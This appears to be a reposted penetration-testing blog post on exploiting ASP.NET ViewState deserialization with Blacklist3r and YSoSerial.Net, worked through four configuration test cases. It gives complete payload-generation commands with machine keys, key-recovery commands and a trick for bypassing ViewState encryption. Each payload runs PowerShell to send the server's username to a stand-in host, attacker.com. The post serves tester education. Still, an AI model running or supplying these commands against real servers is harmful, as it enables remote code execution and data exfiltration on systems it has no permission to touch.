Nytro Posted June 21, 2019

Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net
June 13, 2019

In this blog post, Sanjay walks through several test cases for exploiting ASP.NET ViewState deserialization using Blacklist3r and YSoSerial.Net. Blacklist3r identifies the use of pre-shared (pre-published) machine keys in an application for the encryption and MAC protection of forms authentication cookies, ViewState, etc. An earlier post covered an interesting case of pre-published machine keys leading to an authentication bypass.

How to obtain the MachineKey?

There are several ways, including but not limited to the following, to obtain the machine key used by a .NET application:

- Blacklist3r, if the application uses a pre-shared machine key
- A directory traversal attack that gives access to the web.config file
- An information disclosure issue

ViewState Deserialization Vulnerability

Soroush Dalili (@irsdl) wrote an interesting article on exploiting deserialisation in ASP.NET via ViewState with knowledge of the validation and decryption keys and algorithms. This is where Blacklist3r comes in: it identifies pre-shared machine keys, and the required payloads can then be generated with YSoSerial.Net. YSoSerial.Net supports multiple gadgets for payload generation; the "TextFormattingRunProperties" and "TypeConfuseDelegate" gadgets are used in this demonstration.

Let us first understand what ViewState is and what its attributes are.

What is ViewState?

ViewState is the mechanism the ASP.NET framework uses by default to preserve page and control values between requests. When the HTML for the page is rendered, the current state of the page and the values that need to be retained during postback are serialized into base64-encoded strings and emitted in the __VIEWSTATE hidden field (or fields, when the state is split into chunks).
The following properties, alone or in combination, apply to ViewState data:

- Base64 only: EnableViewStateMac set to false and ViewStateEncryptionMode set to Never (no integrity or confidentiality protection)
- Base64 + MAC (Message Authentication Code): EnableViewStateMac set to true
- Base64 + encrypted: ViewStateEncryptionMode set to Always (or Auto, when a control requests encryption)

Note that ViewStateEncryptionMode takes the values Always, Auto and Never rather than true/false; the test cases below write "true"/"false" for brevity to mean encryption on/off.

"EnableViewStateMac" and "ViewStateEncryptionMode" attributes

In 2014, for ASP.NET >= 1.1: a hotfix was released that makes ASP.NET ignore EnableViewStateMac="false", so MAC validation is enforced regardless of the setting.
https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/
http://support.microsoft.com/kb/2905247 (the hotfix)

In 2016, for ASP.NET >= 4.5: as per the security advisory, the server enforces that ViewState is both MAC-protected and encrypted, and the EnableViewStateMac and ViewStateEncryptionMode attributes are ignored when set to disable either protection.
https://devblogs.microsoft.com/aspnet/secure-asp-net-viewstate/

However, it is still possible to disable ViewState MAC validation and encryption through configuration changes (for example the AspNetEnforceViewStateMac registry value described in the "Farewell EnableViewStateMac" post), so the weak configurations below are still found in the wild.

Test Cases

The test cases below cover the possible scenarios for exploiting ViewState deserialization flaws.

Test Case 1: EnableViewStateMac=false and ViewStateEncryptionMode=false (machine key not required)

Identifying ViewState attributes

The first step is to identify the ViewState attributes. As shown in the figure below, ViewState MAC and encryption are both disabled, which means it is possible to tamper with the ViewState without a machine key. One can simply use YSoSerial.Net to generate a serialized payload that achieves remote code execution.

Command used to generate the payload with YSoSerial.Net:
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

If the ViewState deserialization vulnerability is successfully exploited, the attacker-controlled server receives an out-of-band request containing the username.

[Figure: PoC of successful exploitation]

Test Case 2: .NET < 4.5, EnableViewStateMac=true and ViewStateEncryptionMode=false (machine key required)

Identifying ViewState attributes

The first step is to identify the ViewState attributes. As shown in the figure below, ViewState MAC is enabled and encryption is disabled, which means it is not possible to tamper with the ViewState without the machine key (validationKey).

Obtaining the MachineKey using Blacklist3r

Use Blacklist3r to identify the use of a pre-shared machine key with the following command:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy

--encrypteddata = {__VIEWSTATE parameter value of the target application}
--modifier = {__VIEWSTATEGENERATOR parameter value}

Once a valid machine key is identified, the next step is to generate a serialized payload using YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIEWSTATEGENERATOR parameter value}

If the ViewState deserialization vulnerability is successfully exploited, the attacker-controlled server receives an out-of-band request containing the username.
[Figure: PoC of successful exploitation]

Test Case 3: .NET < 4.5, EnableViewStateMac=true/false and ViewStateEncryptionMode=true (machine key required)

Identifying ViewState attributes

The first step is to identify the ViewState attributes. As shown in the figure below, encryption is enabled, which means it is not possible to tamper with the ViewState without the machine key (validationKey and decryptionKey).

Obtaining the MachineKey using Blacklist3r

The Blacklist3r module for this case is under development. If the machine key is known (e.g. via a directory traversal issue), the YSoSerial.Net command from test case 2 can be used to achieve RCE through the ViewState deserialization vulnerability.

Remove the "__VIEWSTATEENCRYPTED" parameter from the request in order to exploit the vulnerability: in these framework versions the server only attempts to decrypt the ViewState when that field is present, so without it a MAC-only payload signed with the validationKey is accepted. If the field is left in, the server returns a ViewState MAC validation error and the exploit fails, as shown in the figure.

Test Case 4: .NET >= 4.5, any combination of EnableViewStateMac and ViewStateEncryptionMode except both disabled (machine key required)

Identifying ViewState attributes

The first step is to identify the ViewState attributes. As shown in the figure below, encryption is enabled, which means it is not possible to tamper with the ViewState without the machine key (validationKey and decryptionKey).

Obtaining the MachineKey using Blacklist3r

Here Blacklist3r is used to identify the use of a pre-shared machine key. Run the following command:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {directory path of the website in IIS, i.e. the application root}
--TargetPagePath = {target page path within the application}

For a more detailed description of IISDirPath and TargetPagePath, refer to the Blacklist3r documentation.
Once a valid machine key is identified, the next step is to generate a serialized payload using YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2" --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

If the ViewState deserialization vulnerability is successfully exploited, the attacker-controlled server receives an out-of-band request containing the username.

[Figure: PoC of successful exploitation]

For all the test cases, if the YSoSerial.Net ViewState payload is processed successfully, the server responds with "500 Internal Server Error" and the message "The state information is invalid for this page and might be corrupted", and the out-of-band request arrives as shown in the figures below. The error is expected: the gadget chain runs while the ViewState is being deserialized, and the object that comes out is not valid page state, so the page fails afterwards. A 500 with this message but no callback usually points at the command (for example blocked egress) rather than at the deserialization step, whereas a MAC validation error means the key or generator/path is wrong.

[Figure: out-of-band request containing the current username]

For more such vulnerabilities and exploits, check out our upcoming training courses at Black Hat.
https://www.notsosecure.com/blackhat-2019/

References

https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
https://referencesource.microsoft.com/#System.Web/UI/ObjectStateFormatter.cs,6066a5b85c747197
https://github.com/pwntester/ysoserial.net/
https://portswigger.net/kb/issues/00400600_asp-net-viewstate-without-mac-enabled
https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/
https://devblogs.microsoft.com/aspnet/secure-asp-net-viewstate/
http://support.microsoft.com/kb/2905247
https://github.com/Illuminopi/RCEvil.NET
https://www.youtube.com/watch?v=2ZtMVuhtuuA
https://github.com/0xacb/viewgen
https://msdn.microsoft.com/en-us/data/ms178198(v=vs.99)
https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.page.enableviewstatemac?view=netframework-4.8

Source: https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/